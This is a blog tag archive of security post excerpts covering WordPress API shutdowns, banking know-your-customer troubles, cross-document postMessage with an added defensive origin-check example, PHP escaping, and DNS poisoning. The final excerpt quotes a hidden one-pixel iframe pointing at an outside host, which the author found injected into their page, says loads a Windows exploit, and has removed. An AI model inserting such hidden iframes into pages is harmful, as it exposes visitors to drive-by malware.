Tag Archives: security
To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off the XML-RPC and AtomPub interfaces by default. MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause: If your web service only provides one, first-class API through which all access flows, then you’ve only got one point [...]
Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business. Blue Moon Fiber Arts, a small West Coast company, runs a ‘sock club’ service: a yarn-of-the-month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. [...]
Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft. I’ve been reading both specifications. My notes below. Cross Document Messages In the WHAT WG model, a document calls postMessage() on another window, passing the message and the origin it expects that window to have. The receiving document (in another window or iframe) receives a message event, and will [...]
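The security-relevant half of the WHAT WG model is what the receiving document does with the message event: it must check the sender’s origin before acting on the data, and the sender must name the target origin rather than broadcasting with “*”. The following is an added example written for this page, not code from either specification or from the post; the origin https://widgets.example and the JSON message shape are assumptions. The origin check is a pure function so it can be exercised outside a browser; the window wiring only runs when a window exists.

```javascript
// Assumed origin of the one frame we are willing to talk to.
const TRUSTED_ORIGIN = 'https://widgets.example';

// Receiving side. `event` is shaped like a MessageEvent: { origin, data }.
// Returns the parsed message if it came from the trusted origin and is
// well-formed JSON with a string `type`; otherwise null (drop it silently).
function acceptMessage(event, trustedOrigin = TRUSTED_ORIGIN) {
  // event.origin is set by the browser, not by the sender, so it can be trusted.
  if (event.origin !== trustedOrigin) return null;
  let payload;
  try {
    payload = JSON.parse(event.data);
  } catch (e) {
    return null; // malformed message: treat like a hostile one
  }
  if (!payload || typeof payload.type !== 'string') return null;
  return payload;
}

// Sending side. Naming the target origin means the browser refuses to deliver
// the message if the other window has navigated somewhere else meanwhile.
// Never use '*' when the payload carries anything an attacker could use.
function sendTo(targetWindow, payload, targetOrigin = TRUSTED_ORIGIN) {
  const data = JSON.stringify(payload);
  targetWindow.postMessage(data, targetOrigin);
  return data;
}

// Browser wiring (skipped when run under Node).
if (typeof window !== 'undefined') {
  window.addEventListener('message', (event) => {
    const msg = acceptMessage(event);
    if (!msg) return;
    // ... dispatch on msg.type here ...
  });
}
```

Note that the origin check compares the full scheme, host and port; a check on the host alone would let an http:// page impersonate its https:// sibling.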
Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy? Neither kinky boots nor security boasts excuse assault.
Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message: At least it’s one less thing I need to remember.
Adam: It’s easier to check ID than it is to make a judgment call. The consequences illustrated by a scene from a popular film.
Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files). He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input: $html = array(); $html['variable'] = htmlentities($_GET['variable'], ENT_QUOTES, "utf-8"); /* Code [...]
An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine. A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession. Well, for one thing, I could have told [...]
Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page. <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body> The hidden iframe loads a Windows exploit. I have removed it, for the time being. I don’t know how [...]